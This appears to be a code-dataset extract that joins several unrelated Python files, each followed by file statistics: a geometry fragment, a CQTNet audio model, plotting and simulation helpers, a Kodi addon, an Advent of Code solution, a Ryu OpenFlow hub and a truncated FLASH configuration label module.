        returns True if the point is okay, False if it's not
"""
test_value = np.sum(self.complex_weights/(self.c-candidate))
return np.abs(test_value - 2.0j*np.pi) < eps
# end _test_inside_point function
def arr_check(x):
    # Promote scalars to one-element arrays so callers can index uniformly.
    if not isinstance(x, np.ndarray):
        x = np.array([x,])
return x
class Minimal_Global_Smooth_Boundary(Global_Smooth_Boundary):
def __init__(self, c, normal_c, weights, curvature):
self.c = arr_check(c)
self.N = self.c.size
self.normal_c = arr_check(normal_c)
self.weights = arr_check(weights)
self.curvature = arr_check(curvature)
self.x = self.c.real
self.y = self.c.imag
self.normal_x = self.normal_c.real
self.normal_y = self.normal_c.imag
| 42.58371 | 105 | 0.632345 | 1,256 | 9,411 | 4.513535 | 0.204618 | 0.033339 | 0.029635 | 0.023461 | 0.298818 | 0.207268 | 0.207268 | 0.167049 | 0.16211 | 0.118892 | 0 | 0.004066 | 0.268303 | 9,411 | 220 | 106 | 42.777273 | 0.819198 | 0.231325 | 0 | 0.075188 | 0 | 0 | 0.102323 | 0.053514 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135338 | false | 0 | 0.112782 | 0.007519 | 0.383459 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e713a27145ae9d75d9118dbbeea55bf6a791f2 | 2,712 | py | Python | models/CQTNet.py | HQhalo/CQTNet | 0de21565eb7b703420bc9ff8d6b839628233aba5 | [
"MIT"
] | null | null | null | models/CQTNet.py | HQhalo/CQTNet | 0de21565eb7b703420bc9ff8d6b839628233aba5 | [
"MIT"
] | null | null | null | models/CQTNet.py | HQhalo/CQTNet | 0de21565eb7b703420bc9ff8d6b839628233aba5 | [
"MIT"
] | null | null | null | from torch import nn
from collections import OrderedDict
from .basic_module import BasicModule
class CQTNet(BasicModule):
def __init__(self):
super().__init__()
self.features = nn.Sequential(OrderedDict([
('conv0', nn.Conv2d(1, 32, kernel_size=(12, 3), dilation=(1, 1), padding=(6, 0), bias=False)),
('norm0', nn.BatchNorm2d(32)), ('relu0', nn.ReLU(inplace=True)),
('conv1', nn.Conv2d(32, 64, kernel_size=(13, 3), dilation=(1, 2), bias=False)),
('norm1', nn.BatchNorm2d(64)), ('relu1', nn.ReLU(inplace=True)),
('pool1', nn.MaxPool2d((1, 2), stride=(1, 2), padding=(0, 1))),
('conv2', nn.Conv2d(64, 64, kernel_size=(13, 3), dilation=(1, 1), bias=False)),
('norm2', nn.BatchNorm2d(64)), ('relu2', nn.ReLU(inplace=True)),
('conv3', nn.Conv2d(64, 64, kernel_size=(3, 3), dilation=(1, 2), bias=False)),
('norm3', nn.BatchNorm2d(64)), ('relu3', nn.ReLU(inplace=True)),
('pool3', nn.MaxPool2d((1, 2), stride=(1, 2), padding=(0, 1))),
('conv4', nn.Conv2d(64, 128, kernel_size=(3, 3), dilation=(1, 1), bias=False)),
('norm4', nn.BatchNorm2d(128)), ('relu4', nn.ReLU(inplace=True)),
('conv5', nn.Conv2d(128, 128, kernel_size=(3, 3), dilation=(1, 2), bias=False)),
('norm5', nn.BatchNorm2d(128)), ('relu5', nn.ReLU(inplace=True)),
('pool5', nn.MaxPool2d((1, 2), stride=(1, 2), padding=(0, 1))),
('conv6', nn.Conv2d(128, 256, kernel_size=(3, 3), dilation=(1, 1), bias=False)),
('norm6', nn.BatchNorm2d(256)), ('relu6', nn.ReLU(inplace=True)),
('conv7', nn.Conv2d(256, 256, kernel_size=(3, 3), dilation=(1, 2), bias=False)),
('norm7', nn.BatchNorm2d(256)), ('relu7', nn.ReLU(inplace=True)),
('pool7', nn.MaxPool2d((1, 2), stride=(1, 2), padding=(0, 1))),
('conv8', nn.Conv2d(256, 512, kernel_size=(3, 3), dilation=(1, 1), bias=False)),
('norm8', nn.BatchNorm2d(512)), ('relu8', nn.ReLU(inplace=True)),
('conv9', nn.Conv2d(512, 512, kernel_size=(3, 3), dilation=(1, 2), bias=False)),
('norm9', nn.BatchNorm2d(512)), ('relu9', nn.ReLU(inplace=True)),
]))
self.pool = nn.AdaptiveMaxPool2d((1, 1))
self.fc0 = nn.Linear(512, 300)
self.fc1 = nn.Linear(300, 10000)
def forward(self, x):
# input [N, C, H, W] (W = 396)
N = x.size()[0]
x = self.features(x) # [N, 512, 57, 2~15]
x = self.pool(x)
x = x.view(N, -1)
feature = self.fc0(x)
x = self.fc1(feature)
return x, feature
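
# Shape walk-through (illustrative; the exact input height depends on the
# CQT bin count, and the inline comments above give the intermediate sizes):
#   [N, 1, H, 396] -> features -> [N, 512, 57, 2..15] -> AdaptiveMaxPool2d
#   -> [N, 512, 1, 1] -> view -> [N, 512] -> fc0 -> [N, 300] -> fc1 -> [N, 10000]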
| 51.169811 | 106 | 0.54351 | 373 | 2,712 | 3.900804 | 0.268097 | 0.017869 | 0.068729 | 0.116838 | 0.305842 | 0.305842 | 0.276976 | 0.231615 | 0.231615 | 0.082474 | 0 | 0.114548 | 0.237094 | 2,712 | 52 | 107 | 52.153846 | 0.58869 | 0.01733 | 0 | 0 | 0 | 0 | 0.063862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.111111 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e72a8c6b707ef199bb8b6bf9f8aacf999cf31b | 562 | py | Python | tf-Faster-RCNN/Development/graphValid.py | concerttttt/RCNNs-on-Win64 | 603f46efcf9fb74eb0c0975e021ce2c7db184bb7 | [
"MIT"
] | 1 | 2017-09-02T12:35:39.000Z | 2017-09-02T12:35:39.000Z | tf-Faster-RCNN/Development/graphValid.py | concerttttt/RCNNs-on-Win64 | 603f46efcf9fb74eb0c0975e021ce2c7db184bb7 | [
"MIT"
] | null | null | null | tf-Faster-RCNN/Development/graphValid.py | concerttttt/RCNNs-on-Win64 | 603f46efcf9fb74eb0c0975e021ce2c7db184bb7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 28 14:03:45 2017
@author: kjl27
"""
import matplotlib.pyplot as plt
valid52_file = "../Logs/pascal_voc2007/Model52/VALID_Accuracy.txt"
valid54_file = "../Logs/pascal_voc2007/Model54/VALID_Accuracy.txt"
def read_accuracy(path):
    # Each log line ends with an 8-character accuracy value before "\n".
    with open(path) as f:
        return [float(line[-10:-2]) for line in f]

valid52 = read_accuracy(valid52_file)
valid54 = read_accuracy(valid54_file)

plt.plot(valid52, label='Model52')
plt.plot(valid54, label='Model54')
plt.legend()
plt.show()
| 20.071429 | 66 | 0.647687 | 83 | 562 | 4.289157 | 0.554217 | 0.061798 | 0.078652 | 0.117978 | 0.196629 | 0.095506 | 0.095506 | 0 | 0 | 0 | 0 | 0.119469 | 0.19573 | 562 | 28 | 67 | 20.071429 | 0.668142 | 0.169039 | 0 | 0.142857 | 0 | 0 | 0.213508 | 0.213508 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e88ab1dfd6c0fedb4d0decef8fc6524826b59d | 1,234 | py | Python | ndsimulator/engines/read_dump.py | mir-group/NDSimulator | cf0dfbf030202a697dfc9c71f9a44200986638dd | [
"MIT"
] | null | null | null | ndsimulator/engines/read_dump.py | mir-group/NDSimulator | cf0dfbf030202a697dfc9c71f9a44200986638dd | [
"MIT"
] | null | null | null | ndsimulator/engines/read_dump.py | mir-group/NDSimulator | cf0dfbf030202a697dfc9c71f9a44200986638dd | [
"MIT"
] | null | null | null | import numpy as np
from ndsimulator.data import AllData
class ReadDump(AllData):
def __init__(
self,
root: str,
run_name: str,
run=None,
):
self.root = root
self.run_name = run_name
super(ReadDump, self).__init__(run)
def initialize(self, run):
AllData.__init__(self, run=run)
self.current_dt = self.dt
def begin(self):
self.load_data()
self.update(0, 0)
    def load_data(self):
        # f-string prefixes were missing, so the literal text
        # "{self.root}/..." was being handed to np.loadtxt.
        self._energy = np.loadtxt(f"{self.root}/{self.run_name}/energy.dat")
        self._positions = np.loadtxt(f"{self.root}/{self.run_name}/pos.dat")
        self._colv = np.loadtxt(f"{self.root}/{self.run_name}/colvar.dat")
        self._bias = self._energy.shape[1] > 7
def update(self, step, time):
atoms = self.atoms
atoms.positions = self._positions[step, :]
atoms.colv = self._colv[step, :]
(
self.current_dt,
atoms.T,
atoms.pe,
atoms.ke,
atoms.biase,
atoms.totale,
) = self._energy[step, 1:7]
        if self._bias:
            # Placeholder: biased runs need no extra handling here yet.
            pass
return True
| 25.183673 | 75 | 0.540519 | 151 | 1,234 | 4.205298 | 0.337748 | 0.066142 | 0.069291 | 0.094488 | 0.132283 | 0.132283 | 0.132283 | 0 | 0 | 0 | 0 | 0.007335 | 0.337115 | 1,234 | 48 | 76 | 25.708333 | 0.768949 | 0 | 0 | 0 | 0 | 0 | 0.089951 | 0.089951 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121951 | false | 0.02439 | 0.04878 | 0 | 0.219512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2ec3c4738f439924114446b934a66b0a66dd359 | 678 | py | Python | .kodi/addons/script.module.axel.downloader/controlpanel.py | C6SUMMER/allinclusive-kodi-pi | 8baf247c79526849c640c6e56ca57a708a65bd11 | [
"Apache-2.0"
] | null | null | null | .kodi/addons/script.module.axel.downloader/controlpanel.py | C6SUMMER/allinclusive-kodi-pi | 8baf247c79526849c640c6e56ca57a708a65bd11 | [
"Apache-2.0"
] | null | null | null | .kodi/addons/script.module.axel.downloader/controlpanel.py | C6SUMMER/allinclusive-kodi-pi | 8baf247c79526849c640c6e56ca57a708a65bd11 | [
"Apache-2.0"
] | 2 | 2018-04-17T17:34:39.000Z | 2020-07-26T03:43:33.000Z | import xbmc, xbmcgui
#get actioncodes from https://github.com/xbmc/xbmc/blob/master/xbmc/guilib/Key.h
ACTION_PREVIOUS_MENU = 10
ACTION_SELECT_ITEM = 7
class MyClass(xbmcgui.Window):
def __init__(self):
self.strActionInfo = xbmcgui.ControlLabel(100, 120, 800, 400, '', 'font13', '0xFFFF00FF')
self.addControl(self.strActionInfo)
        self.strActionInfo.setLabel('More options here to control the Download Manager, press any key to close')
def onAction(self, action):
self.close()
def message(self, message):
dialog = xbmcgui.Dialog()
dialog.ok("Byebye!", message)
mydisplay = MyClass()
mydisplay.doModal()
del mydisplay | 30.818182 | 110 | 0.705015 | 85 | 678 | 5.529412 | 0.658824 | 0.108511 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035907 | 0.178466 | 678 | 22 | 111 | 30.818182 | 0.807899 | 0.116519 | 0 | 0 | 0 | 0 | 0.16782 | 0 | 0 | 0 | 0.017301 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2ed8af9cf95e6636dde197311f06fce010f70d7 | 514 | py | Python | settings.py | juniorpedroso/My-Rocket | b2235329b0a90e939cf245f9aa309d3af79f2f77 | [
"MIT"
] | null | null | null | settings.py | juniorpedroso/My-Rocket | b2235329b0a90e939cf245f9aa309d3af79f2f77 | [
"MIT"
] | null | null | null | settings.py | juniorpedroso/My-Rocket | b2235329b0a90e939cf245f9aa309d3af79f2f77 | [
"MIT"
] | null | null | null | vermelho = (255, 0, 0)
verde = (0, 255, 0)
azul = (0, 0, 255)
cinza = (230, 230, 230)
cinzaescuro = (128, 128, 128)
class Settings():
"""[Uma classe para armazenar todas as configurações de
My Rocket.]
"""
def __init__(self):
"""[Inicializa as configurações do jogo]
"""
# Configuração da tela
self.screen_width = 600
self.screen_height = 400
self.bg_color = cinzaescuro
# Configurações do foguete
self.rocket_speed_factor = 0.5
| 22.347826 | 60 | 0.59144 | 64 | 514 | 4.609375 | 0.640625 | 0.027119 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112948 | 0.293774 | 514 | 22 | 61 | 23.363636 | 0.699725 | 0.309339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2ef46dad8e30bcb6e31ba7c2d5dcf099bc6aee7 | 1,426 | py | Python | adventofcode/solutions/y2020/d23_linked_list.py | codertee/adventofcode | a2f07d947815212afabf6eeca31f112b9fdf39ca | [
"BSD-3-Clause"
] | 2 | 2020-12-10T22:29:56.000Z | 2020-12-22T01:57:28.000Z | adventofcode/solutions/y2020/d23_linked_list.py | codertee/adventofcode | a2f07d947815212afabf6eeca31f112b9fdf39ca | [
"BSD-3-Clause"
] | null | null | null | adventofcode/solutions/y2020/d23_linked_list.py | codertee/adventofcode | a2f07d947815212afabf6eeca31f112b9fdf39ca | [
"BSD-3-Clause"
] | 2 | 2020-12-18T04:05:50.000Z | 2020-12-21T14:25:10.000Z | from adventofcode.inputs import get_input
from adventofcode.utils import aoc_timer
class Cup:
__slots__ = ('v', 'n')
def __init__(self, val, next_cup=None):
self.v = val
self.n = next_cup
def play(cups: list, turns=100):
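    # Crab-cups via a value-indexed singly linked list: cups_map[v] holds the
    # Cup whose value is v, so finding the destination cup and splicing the
    # three picked-up cups back in are both O(1) per move.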
max_val = max(cups)
cup = None
cups_map = [None] * (max_val + 1)
for val in cups[::-1]:
cup = cups_map[val] = Cup(val, cup)
current = cups_map[cups[-1]].n = cup
for _ in range(turns):
one = current.n
two = one.n
three = two.n
selected = current.v - 1
while selected in (one.v, two.v, three.v, 0):
selected = selected - 1 if selected > 0 else max_val
selected = cups_map[selected]
current.n = three.n
three.n = selected.n
selected.n = one
current = current.n
return cups_map[1]
@aoc_timer(1, 23, 2020)
def solve_first(cups):
cup = play(cups)
res = ''
for _ in range(len(cups) - 1):
cup = cup.n
res += str(cup.v)
return res
@aoc_timer(2, 23, 2020)
def solve_second(cups):
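    # Part 2: pad the input out to one million cups, play ten million moves,
    # and multiply the labels of the two cups clockwise of cup 1.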
low, high = max(cups) + 1, 1000001
cups += list(range(low, high))
cup = play(cups, 10000000)
return cup.n.v * cup.n.n.v
def parse_input(input_str):
return list(map(int, input_str.strip()))
if __name__ == '__main__':
cups = parse_input(get_input(23, year=2020))
solve_first(cups)
solve_second(cups)
| 23.377049 | 64 | 0.584151 | 215 | 1,426 | 3.683721 | 0.27907 | 0.044192 | 0.020202 | 0.035354 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047244 | 0.287518 | 1,426 | 60 | 65 | 23.766667 | 0.732283 | 0 | 0 | 0 | 0 | 0 | 0.007013 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106383 | false | 0 | 0.042553 | 0.021277 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f058557fa5bf7c30301c20247e9518b4078896 | 1,210 | py | Python | Chapter10/chapter10_2.py | dimjay/Mastering-Python-Networking | 7d167aeb821718a6f24b65bffe539765cf98293f | [
"MIT"
] | 107 | 2017-03-31T09:39:47.000Z | 2022-01-10T17:43:12.000Z | Chapter10/chapter10_2.py | dimjay/Mastering-Python-Networking | 7d167aeb821718a6f24b65bffe539765cf98293f | [
"MIT"
] | 2 | 2021-03-20T05:31:10.000Z | 2022-03-08T21:11:02.000Z | Chapter10/chapter10_2.py | dimjay/Mastering-Python-Networking | 7d167aeb821718a6f24b65bffe539765cf98293f | [
"MIT"
] | 98 | 2017-02-25T17:55:43.000Z | 2022-02-20T19:06:06.000Z | # Referenced from ryu/ryu/app/simple_switch_13.py
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3, ofproto_v1_0
class SimpleHub(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_0.OFP_VERSION]
#OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(SimpleHub, self).__init__(*args, **kwargs)
@set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self, ev):
message = ev.msg
print("message: ", message)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def packet_in_handler(self, ev):
msg = ev.msg
print("ev message: ", ev.msg)
datapath = msg.datapath
ofproto = datapath.ofproto
ofp_parser = datapath.ofproto_parser
        actions = [ofp_parser.OFPActionOutput(ofproto.OFPP_FLOOD)]
        # When the switch did not buffer the packet (OFP_NO_BUFFER), the raw
        # bytes must ride along or the flooded frame would be empty.
        data = None
        if msg.buffer_id == ofproto.OFP_NO_BUFFER:
            data = msg.data
        out = ofp_parser.OFPPacketOut(
            datapath=datapath, buffer_id=msg.buffer_id, in_port=msg.in_port,
            actions=actions, data=data)
        datapath.send_msg(out)
| 31.842105 | 76 | 0.716529 | 160 | 1,210 | 5.1 | 0.35 | 0.051471 | 0.0625 | 0.058824 | 0.112745 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010246 | 0.193388 | 1,210 | 37 | 77 | 32.702703 | 0.82582 | 0.072727 | 0 | 0 | 0 | 0 | 0.018817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.2 | 0 | 0.4 | 0.08 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2f0df3d2b0b35ab406a052f5970cc062ed892cd | 27,201 | py | Python | sirepo/template/flash_views.py | mkeilman/sirepo | 29ac632f688b019c95d69191a84848f263433dd7 | [
"Apache-2.0"
] | 49 | 2015-07-29T14:11:29.000Z | 2021-12-10T15:24:26.000Z | sirepo/template/flash_views.py | mkeilman/sirepo | 29ac632f688b019c95d69191a84848f263433dd7 | [
"Apache-2.0"
] | 3,732 | 2015-08-03T22:07:26.000Z | 2022-03-31T22:48:33.000Z | sirepo/template/flash_views.py | mkeilman/sirepo | 29ac632f688b019c95d69191a84848f263433dd7 | [
"Apache-2.0"
] | 28 | 2015-11-20T16:23:46.000Z | 2021-09-20T07:22:48.000Z | # -*- coding: utf-8 -*-
u"""Flash Config parser.
:copyright: Copyright (c) 2021 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from pykern import pkio
from pykern.pkcollections import PKDict
from pykern.pkdebug import pkdc, pkdp, pkdlog
import inspect
import re
def _fields(templates, values):
# template: [field template, label template]
# values: values to insert into the field/label templates
return {
t[0].format(v): t[1].format(v.upper()) for v in values for t in templates
}
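
# Worked example of the label builder above (values match the call sites):
#   _fields([['{}min', '{} Minimum']], ['x']) == {'xmin': 'X Minimum'}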
class SpecializedViews:
# POSIT: FLASH field names are unique so flat list is ok
_LABELS = PKDict(
LimitedSlopeBeta='Limited Slope Beta',
RiemannSolver='Riemann Solver',
UnitSystem='System of Units',
allowDtSTSDominate='allowDtSTSDominate',
cfl='Courant Factor',
charLimiting='Characteristic Limiting',
cvisc='Artificial Viscosity Constant',
diff_eleFlCoef='Flux Limiter Coefficient',
diff_eleXlBoundaryType='X Left Boundary',
diff_eleXrBoundaryType='X Right Boundary',
diff_eleYlBoundaryType='Y Left Boundary',
diff_eleYrBoundaryType='Y Right Boundary',
diff_eleZlBoundaryType='Z Left Boundary',
diff_eleZrBoundaryType='Z Right Boundary',
diff_thetaImplct='Implicitness Factor',
diff_useEleCond='Use Ele Conduction',
dt_diff_factor='Timestep Factor',
dtinit='Initial Timestep [s]',
dtmax='Maximum Timestep',
dtmin='Minimum Timestep',
ed_crossSectionFunctionType_1='Cross Section Function Type',
ed_gaussianCenterMajor_1='Major Gaussian Center',
ed_gaussianCenterMinor_1='Minor Gaussian Center',
ed_gaussianExponent_1='Gaussian Exponent',
ed_gaussianRadiusMajor_1='Major Gaussian Radius',
ed_gaussianRadiusMinor_1='Minor Gaussian Radius',
ed_gradOrder='Gradient Order',
ed_gridType_1='Type of Beam Grid',
ed_laser3Din2D='3D Ray Tracing',
ed_laser3Din2DwedgeAngle='Wedge Angle',
ed_laserIOMaxNumberOfPositions='Max Ray Positions',
ed_laserIOMaxNumberOfRays='Max Rays',
ed_lensSemiAxisMajor_1='Lens Semi Axis Major',
ed_lensX_1='Lens X',
ed_lensY_1='Lens Y',
ed_lensZ_1='Lens Z',
ed_maxRayCount='Max Ray Count',
ed_numberOfBeams='Number of Beams',
ed_numberOfPulses='Number of Pulses',
ed_numberOfRays_1='Number of Rays',
ed_numberOfSections_1='Number of Sections',
ed_power_1_1='Laser Pulse Section 1',
ed_power_1_2='Laser Pulse Section 2',
ed_power_1_3='Laser Pulse Section 3',
ed_power_1_4='Laser Pulse Section 4',
ed_pulseNumber_1='Pulse Number',
ed_semiAxisMajorTorsionAngle_1='Major Semiaxis Torsion Angle',
ed_semiAxisMajorTorsionAxis_1='Major Semiaxis Torsion Axis',
ed_targetSemiAxisMajor_1='Major Target Semiaxis',
ed_targetSemiAxisMinor_1='Minor Target Semiaxis',
ed_targetX_1='X Target',
ed_targetY_1='Y Target',
ed_targetZ_1='Z Target',
ed_time_1_1='Laser Pulse Section 1',
ed_time_1_2='Laser Pulse Section 2',
ed_time_1_3='Laser Pulse Section 3',
ed_time_1_4='Laser Pulse Section 4',
ed_useLaserIO='Use Laser IO',
ed_wavelength_1='Wavelength',
entropy='Entropy Fix',
eosMode='Eos Mode',
eosModeInit='Initial Eos Mode',
fl_b='Flame Width',
fl_epsilon_0='Lower Sharpening Factor',
fl_epsilon_1='Upper Sharpening Factor',
fl_fsConstFlameSpeed='Constant Flame Speed',
fl_kpp_fact='Prefactor Adjustment',
flame_deltae='Flame Delta e',
gconst='Acceleration Constant',
gdirec='Direction of Acceleration',
geometry='Grid Geometry',
grav_boundary_type='Boundary Condition',
lrefine_max='Maximum Refinement Level',
lrefine_min='Minimum Refinement Level',
order='Order',
plotFileIntervalTime='Plot File Interval Time [s]',
refine_var_count='Refine Variable Count',
rt_dtFactor='Time Step Coefficient',
rt_mgdBounds_1='Boundary 1',
rt_mgdBounds_2='Boundary 2',
rt_mgdBounds_3='Boundary 3',
rt_mgdBounds_4='Boundary 4',
rt_mgdBounds_5='Boundary 5',
rt_mgdBounds_6='Boundary 6',
rt_mgdBounds_7='Boundary 7',
rt_mgdFlCoef='MGD Flux Limiter Coefficient',
        rt_mgdFlMode='MGD Flux Limiter Mode',
rt_mgdNumGroups='Number of Groups',
rt_mgdXlBoundaryType='X MGD Left Boundary',
rt_mgdXrBoundaryType='X MGD Right Boundary',
rt_mgdYlBoundaryType='Y MGD Left Boundary',
rt_mgdYrBoundaryType='Y MGD Right Boundary',
rt_mgdZlBoundaryType='Z MGD Left Boundary',
rt_mgdZrBoundaryType='Z MGD Right Boundary',
rt_useMGD='Use Multigroup Radiation Diffusion',
shockDetect='Use Strong Compressive Shock Detection',
slopeLimiter='Slope Limiter',
sumyi_burned='Burned sumyi',
sumyi_unburned='Unburned sumyi',
threadHydroBlockList='Block List Threading',
threadHydroWithinBlock='Within Block Threading',
tmax='Maximum Simulation Time [s]',
updateHydroFluxes='Update Hydro Fluxes',
useDiffuse='Use Diffusive Effects',
useEnergyDeposition='Use Energy Deposition',
useFlame='Use Flame',
useGravity='Use Gravity',
useHydro='Use Hydro Calculation',
useRadTrans='Use Radiative Transfer',
use_cma_advection='Use CMA Advection',
use_cma_flattening='Use CMA Flattening',
ye_burned='Burned ye',
ye_unburned='Unburned ye',
**_fields([
['{}l_boundary_type', '{} Lower Boundary Type'],
['{}r_boundary_type', '{} Upper Boundary Type'],
['{}min', '{} Minimum'],
['{}max', '{} Maximum'],
['nblock{}', 'Blocks in {}'],
], ['x', 'y', 'z']),
**_fields([
['refine_var_{}', 'Name Variable {}'],
['refine_cutoff_{}', 'Refine Variable {}'],
['derefine_cutoff_{}', 'Derefine Variable {}'],
], [str(v) for v in range(1, 7)]),
)
_VIEW_FUNC_PREFIX = '_view_'
def __init__(self):
self._view_fns = PKDict()
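        # Introspection: any method named _view_<ViewName> is registered so
        # update_schema can patch just the views a given FLASH setup defines.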
for n, o in inspect.getmembers(self):
if n.startswith(self._VIEW_FUNC_PREFIX) and inspect.ismethod(o):
self._view_fns[n[len(self._VIEW_FUNC_PREFIX):]] = o
def update_schema(self, schema):
self._update_labels(schema)
self._update_views(schema)
return schema
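    # Typical use (a sketch; assumes a PKDict schema exposing .model and
    # .view, as the surrounding sirepo flash template passes in):
    #   schema = SpecializedViews().update_schema(schema)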
def _assert_model_view_fields_exist(self, name, view, schema):
"""Check that model fields in view exist in models"""
def flatten(to_flatten):
def flatten_column(to_flatten):
if isinstance(to_flatten[0], str):
return flatten(to_flatten[1])
res = []
for f in to_flatten:
res += flatten_column(f)
return res
res = []
for f in to_flatten:
if isinstance(f, str):
res.append(f)
continue
                assert isinstance(f, list), \
                    f'unknown type f={f}'
res += flatten_column(f)
return res
for f in flatten(view.get('basic', []) + view.get('advanced', [])):
if '.' not in f:
f = f'{name}.{f}'
p = f.split('.')
assert p[0] in schema.model, \
f'model name={p[0]} does not exist in known models={schema.model.keys()}'
assert p[1] in schema.model[p[0]], \
f'field={p[1]} does not exist in model={schema.model[p[0]]} name={p[0]}'
def _get_species_list(self, schema):
res = []
for f in schema.model.Multispecies_MultispeciesMain:
m = re.search(r'eos_(.*)EosType', f)
if m:
res.append(m.group(1))
return res
def _update_labels(self, schema):
labels = self._LABELS.copy()
self._update_sim_labels(schema, labels)
self._update_multispecies_labels(schema, labels)
for m in schema.model.values():
for f in m:
if f not in labels:
continue
info = m[f]
if len(info) == 3:
info.append(f)
elif info[3]:
info[3] = '{} {}'.format(f, info[3])
else:
info[3] = f
info[0] = labels[f]
def _update_multispecies_labels(self, schema, labels):
if 'Multispecies_MultispeciesMain' not in schema.model:
return
for s in self._get_species_list(schema):
for f, label in {
'ms_{}A': 'Number of protons and neutrons in nucleus',
'ms_{}Z': 'Atomic number',
'ms_{}ZMin': 'Minimum allowed average ionization',
'eos_{}EosType': 'EOS type to use for MTMMMT EOS',
'eos_{}SubType': 'EOS subtype to use for MTMMMT EOS',
'ms_{}Gamma': 'Ratio of heat capacities',
'eos_{}TableFile': 'Tabulated EOS file name',
'op_{}Absorb': 'Absorption',
'op_{}Emiss': 'Emission',
'op_{}Trans': 'Transport',
}.items():
labels[f.format(s)] = f'{s.title()} {label}'
def _update_sim_labels(self, schema, labels):
#TODO(pjm): use constant for flashApp model
# special case for main simulation labels - use full description as label
for f, info in schema.model.Simulation_SimulationMain_flashApp.items():
if len(info) > 3:
labels[f] = info[3]
info[3] = ''
def _update_views(self, schema):
for n, f in self._view_fns.items():
if n not in schema.view:
continue
v = f(schema)
if v:
self._assert_model_view_fields_exist(n, v, schema)
schema.view[n].update(v)
def _view_Driver_DriverMain(self, schema):
# http://flash.uchicago.edu/site/flashcode/user_support/rpDoc_4p2.py?submit=rp_Driver.txt
v = PKDict(
title='Simulation Driver',
advanced=[
['Driver', [
'dr_abortPause',
'dr_dtMinBelowAction',
'dr_dtMinContinue',
'dr_numPosdefVars',
'dr_posdefDtFactor',
'dr_posdefVar_1',
'dr_posdefVar_2',
'dr_posdefVar_3',
'dr_posdefVar_4',
'dr_printTStepLoc',
'dr_shortenLastStepBeforeTMax',
'dr_tstepSlowStartFactor',
'dr_usePosdefComputeDt',
]],
['Drift', [
'drift_break_inst',
'drift_trunc_mantissa',
'drift_tuples',
'drift_verbose_inst',
]],
['Time', [
'wall_clock_time_limit',
'tinitial',
]],
['Timestep', [
'tstep_change_factor',
'nbegin',
'nend',
'useSTS',
'useSTSforDiffusion',
